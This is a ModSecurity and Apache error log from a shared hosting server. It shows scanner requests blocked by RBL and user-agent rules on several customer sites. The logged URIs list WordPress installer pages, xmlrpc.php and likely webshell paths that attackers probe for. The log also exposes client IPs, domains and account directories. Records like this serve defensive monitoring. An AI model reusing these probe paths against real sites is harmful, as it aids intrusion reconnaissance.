[Tue May 26 17:42:38.470795 2026] [security2:error] [pid 924957:tid 925128] [client 54.205.63.235:59340] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/wordpress1/wp-admin/setup-config.php"] [unique_id "ahWONuYv2AvxeXULfJdNxAAAACk"]
[Tue May 26 17:42:38.470999 2026] [security2:error] [pid 924957:tid 925147] [client 54.205.63.235:59342] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/backup/wp-admin/setup-config.php"] [unique_id "ahWONuYv2AvxeXULfJdNxwAAADw"]
[Tue May 26 17:42:38.471041 2026] [security2:error] [pid 924957:tid 925111] [client 54.205.63.235:59345] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/wordpress/wp-admin/install.php"] [unique_id "ahWONuYv2AvxeXULfJdNyQAAABg"]
[Tue May 26 17:42:38.471094 2026] [security2:error] [pid 924957:tid 925094] [client 54.205.63.235:59346] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/old/wp-admin/install.php"] [unique_id "ahWONuYv2AvxeXULfJdNygAAAAc"]
[Tue May 26 17:42:38.471123 2026] [security2:error] [pid 924957:tid 925097] [client 54.205.63.235:59347] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/staging/wp-admin/install.php"] [unique_id "ahWONuYv2AvxeXULfJdNywAAAAo"]
[Tue May 26 17:42:38.471248 2026] [security2:error] [pid 924957:tid 925113] [client 54.205.63.235:59351] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/backup/wp-admin/install.php"] [unique_id "ahWONuYv2AvxeXULfJdNzQAAABo"]
[Tue May 26 17:42:38.471529 2026] [security2:error] [pid 924957:tid 925156] [client 54.205.63.235:59352] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/demo/wp-admin/install.php"] [unique_id "ahWONuYv2AvxeXULfJdNzgAAAEU"]
[Tue May 26 17:42:38.471668 2026] [security2:error] [pid 924957:tid 925142] [client 54.205.63.235:59343] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/wp-admin/install.php"] [unique_id "ahWONuYv2AvxeXULfJdNyAAAADc"]
[Tue May 26 17:42:38.471796 2026] [security2:error] [pid 924957:tid 925176] [client 54.205.63.235:59348] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/wordpress1/wp-admin/install.php"] [unique_id "ahWONuYv2AvxeXULfJdNzAAAAFk"]
[Tue May 26 17:42:38.472435 2026] [security2:error] [pid 924957:tid 925099] [client 54.205.63.235:59350] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/wp/wp-admin/install.php"] [unique_id "ahWONuYv2AvxeXULfJdNzwAAAAw"]
[Tue May 26 17:42:38.539131 2026] [security2:error] [pid 924957:tid 925112] [client 54.205.63.235:59433] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/test/wp-admin/install.php"] [unique_id "ahWONuYv2AvxeXULfJdN0AAAABk"]
[Tue May 26 17:42:38.937298 2026] [security2:error] [pid 924957:tid 925161] [client 45.92.1.17:53474] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahWONuYv2AvxeXULfJdN2gAAAEo"]
[Tue May 26 17:42:39.326830 2026] [security2:error] [pid 924957:tid 925145] [client 45.92.1.17:53824] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahWON-Yv2AvxeXULfJdN4QAAADo"]
[Tue May 26 17:42:39.708246 2026] [security2:error] [pid 924957:tid 925134] [client 45.92.1.17:54019] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahWON-Yv2AvxeXULfJdN-AAAAC8"]
[Tue May 26 17:42:39.785492 2026] [security2:error] [pid 924957:tid 925191] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWON-Yv2AvxeXULfJdN5AAAAGg"]
[Tue May 26 17:42:40.089000 2026] [security2:error] [pid 924957:tid 925113] [client 45.92.1.17:54177] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahWOOOYv2AvxeXULfJdOAQAAABo"]
[Tue May 26 17:42:40.850208 2026] [security2:error] [pid 924957:tid 925117] [client 45.92.1.17:54616] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/wp-plain.php"] [unique_id "ahWOOOYv2AvxeXULfJdOFgAAAB4"], referer: www.google.com
[Tue May 26 17:42:40.851744 2026] [security2:error] [pid 924957:tid 925175] [client 45.92.1.17:54615] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWOOOYv2AvxeXULfJdOFwAAAFg"]
[Tue May 26 17:42:40.857607 2026] [security2:error] [pid 924957:tid 925123] [client 45.92.1.17:54618] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWOOOYv2AvxeXULfJdOGwAAACQ"], referer: www.google.com
[Tue May 26 17:42:41.104688 2026] [security2:error] [pid 924957:tid 925181] [client 45.92.1.17:54781] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/vczgcqhw.php"] [unique_id "ahWOOeYv2AvxeXULfJdOJgAAAF4"], referer: www.google.com
[Tue May 26 17:42:41.240797 2026] [security2:error] [pid 924957:tid 925158] [client 45.92.1.17:54796] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWOOeYv2AvxeXULfJdOLQAAAEc"], referer: www.google.com
[Tue May 26 17:42:41.292897 2026] [security2:error] [pid 924957:tid 925188] [client 45.92.1.17:54919] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWOOeYv2AvxeXULfJdOMAAAAGU"]
[Tue May 26 17:42:41.293129 2026] [security2:error] [pid 924957:tid 925103] [client 45.92.1.17:54916] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-plain.php"] [unique_id "ahWOOeYv2AvxeXULfJdOLwAAABA"], referer: www.google.com
[Tue May 26 17:42:41.296892 2026] [security2:error] [pid 924957:tid 925147] [client 45.92.1.17:54918] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWOOeYv2AvxeXULfJdOMwAAADw"], referer: www.google.com
[Tue May 26 17:42:41.495858 2026] [security2:error] [pid 924957:tid 925156] [client 45.92.1.17:54993] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/wp-plain.php"] [unique_id "ahWOOeYv2AvxeXULfJdOOwAAAEU"], referer: www.google.com
[Tue May 26 17:42:41.534020 2026] [security2:error] [pid 924957:tid 925189] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOOeYv2AvxeXULfJdOKQAAAGY"]
[Tue May 26 17:42:41.545896 2026] [security2:error] [pid 924957:tid 925149] [client 45.92.1.17:55060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/qzczbfex.php"] [unique_id "ahWOOeYv2AvxeXULfJdOQgAAAD4"], referer: www.google.com
[Tue May 26 17:42:41.677326 2026] [security2:error] [pid 924957:tid 925094] [client 45.92.1.17:55068] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWOOeYv2AvxeXULfJdOQwAAAAc"], referer: www.google.com
[Tue May 26 17:42:41.766168 2026] [security2:error] [pid 924957:tid 925212] [client 45.92.1.17:54617] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "lmialumni.org"] [uri "/index.php"] [unique_id "ahWOOOYv2AvxeXULfJdOGQAAAH0"], referer: www.google.com
[Tue May 26 17:42:41.880026 2026] [security2:error] [pid 924957:tid 925199] [client 45.92.1.17:55185] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/bpqjgjvx.php"] [unique_id "ahWOOeYv2AvxeXULfJdOTQAAAHA"], referer: www.google.com
[Tue May 26 17:42:41.931152 2026] [security2:error] [pid 924957:tid 925207] [client 45.92.1.17:55228] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-plain.php"] [unique_id "ahWOOeYv2AvxeXULfJdOTwAAAHg"], referer: www.google.com
[Tue May 26 17:42:42.028565 2026] [security2:error] [pid 924957:tid 925102] [client 223.235.98.214:24913] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWOOeYv2AvxeXULfJdOTgAAAA8"]
[Tue May 26 17:42:42.028715 2026] [security2:error] [pid 924957:tid 925102] [client 223.235.98.214:24913] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWOOeYv2AvxeXULfJdOTgAAAA8"]
[Tue May 26 17:42:42.314286 2026] [security2:error] [pid 924957:tid 925152] [client 45.92.1.17:55403] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/whuwfgal.php"] [unique_id "ahWOOuYv2AvxeXULfJdOXQAAAEE"], referer: www.google.com
[Tue May 26 17:42:42.500775 2026] [security2:error] [pid 924957:tid 925140] [client 45.92.1.17:54617] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "lmialumni.org"] [uri "/index.php"] [unique_id "ahWOOuYv2AvxeXULfJdOXAAAAAM"], referer: www.google.com
[Tue May 26 17:42:42.890035 2026] [security2:error] [pid 924957:tid 925190] [client 45.92.1.17:55316] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahWOOuYv2AvxeXULfJdOagAAAGc"]
[Tue May 26 17:42:43.016315 2026] [security2:error] [pid 924957:tid 925176] [client 207.174.214.47:21464] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "friendsalongtheway.net"] [uri "/wp-cron.php"] [unique_id "ahWOO-Yv2AvxeXULfJdOawAAAFk"]
[Tue May 26 17:42:43.020260 2026] [security2:error] [pid 924957:tid 925151] [client 45.92.1.17:54913] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "friendsalongtheway.net"] [uri "/index.php"] [unique_id "ahWOOeYv2AvxeXULfJdOMgAAAEA"], referer: www.google.com
[Tue May 26 17:42:43.267174 2026] [security2:error] [pid 924957:tid 925165] [client 45.92.1.17:55921] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahWOO-Yv2AvxeXULfJdOdQAAAE4"]
[Tue May 26 17:42:43.408426 2026] [security2:error] [pid 924957:tid 925146] [client 45.92.1.17:55083] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahWOO-Yv2AvxeXULfJdOegAAADs"]
[Tue May 26 17:42:43.651656 2026] [security2:error] [pid 924957:tid 925124] [client 45.92.1.17:56092] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahWOO-Yv2AvxeXULfJdOewAAACU"]
[Tue May 26 17:42:43.792473 2026] [security2:error] [pid 924957:tid 925167] [client 45.92.1.17:56179] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahWOO-Yv2AvxeXULfJdOgwAAAFA"]
[Tue May 26 17:42:43.886201 2026] [security2:error] [pid 924957:tid 925204] [client 45.92.1.17:54913] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "friendsalongtheway.net"] [uri "/index.php"] [unique_id "ahWOO-Yv2AvxeXULfJdOeQAAAHU"], referer: www.google.com
[Tue May 26 17:42:44.033602 2026] [security2:error] [pid 924957:tid 925196] [client 45.92.1.17:56311] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahWOPOYv2AvxeXULfJdOiAAAAG0"]
[Tue May 26 17:42:44.179078 2026] [security2:error] [pid 924957:tid 925210] [client 45.92.1.17:56393] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahWOPOYv2AvxeXULfJdOkgAAAHs"]
[Tue May 26 17:42:44.509740 2026] [security2:error] [pid 924957:tid 925211] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOPOYv2AvxeXULfJdOiwAAAHw"]
[Tue May 26 17:42:44.563284 2026] [security2:error] [pid 924957:tid 925170] [client 45.92.1.17:56536] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahWOPOYv2AvxeXULfJdOlgAAAFM"]
[Tue May 26 17:42:44.630027 2026] [security2:error] [pid 924957:tid 924978] [remote 216.73.216.30:3771] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWOPOYv2AvxeXULfJdOlwAAKRQ"]
[Tue May 26 17:42:44.924640 2026] [core:crit] [pid 924957:tid 925138] (13)Permission denied: [client 40.77.167.42:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:42:46.410041 2026] [security2:error] [pid 924957:tid 925210] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOPeYv2AvxeXULfJdOwwAAAHs"]
[Tue May 26 17:42:48.032797 2026] [security2:error] [pid 924957:tid 925090] [client 74.7.244.58:59274] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.futurance.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWOQOYv2AvxeXULfJdO9QAAAyc"]
[Tue May 26 17:42:49.092875 2026] [security2:error] [pid 924957:tid 925172] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOQOYv2AvxeXULfJdPBQAAAFU"]
[Tue May 26 17:42:49.924318 2026] [security2:error] [pid 924957:tid 925023] [remote 216.73.216.30:11464] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWOQeYv2AvxeXULfJdPHAAAREE"]
[Tue May 26 17:42:50.448329 2026] [security2:error] [pid 924957:tid 925093] [client 37.59.204.152:33368] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "stvica.com"] [uri "/robots.txt"] [unique_id "ahWOQuYv2AvxeXULfJdPKQAAAAY"]
[Tue May 26 17:42:50.448442 2026] [security2:error] [pid 924957:tid 925093] [client 37.59.204.152:33368] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "stvica.com"] [uri "/robots.txt"] [unique_id "ahWOQuYv2AvxeXULfJdPKQAAAAY"]
[Tue May 26 17:42:51.454734 2026] [security2:error] [pid 924957:tid 925130] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOQ-Yv2AvxeXULfJdPPwAAACs"]
[Tue May 26 17:42:51.725128 2026] [autoindex:error] [pid 924957:tid 925155] [client 43.153.215.249:56568] AH01276: Cannot serve directory /home2/abili6ui/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:42:52.089892 2026] [security2:error] [pid 924957:tid 925088] [client 142.44.225.11:37110] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "stvica.com"] [uri "/"] [unique_id "ahWOROYv2AvxeXULfJdPWwAAAAE"]
[Tue May 26 17:42:52.090004 2026] [security2:error] [pid 924957:tid 925088] [client 142.44.225.11:37110] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "stvica.com"] [uri "/"] [unique_id "ahWOROYv2AvxeXULfJdPWwAAAAE"]
[Tue May 26 17:42:52.145543 2026] [security2:error] [pid 924957:tid 925135] [client 223.235.98.214:1216] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWOROYv2AvxeXULfJdPYAAAADA"]
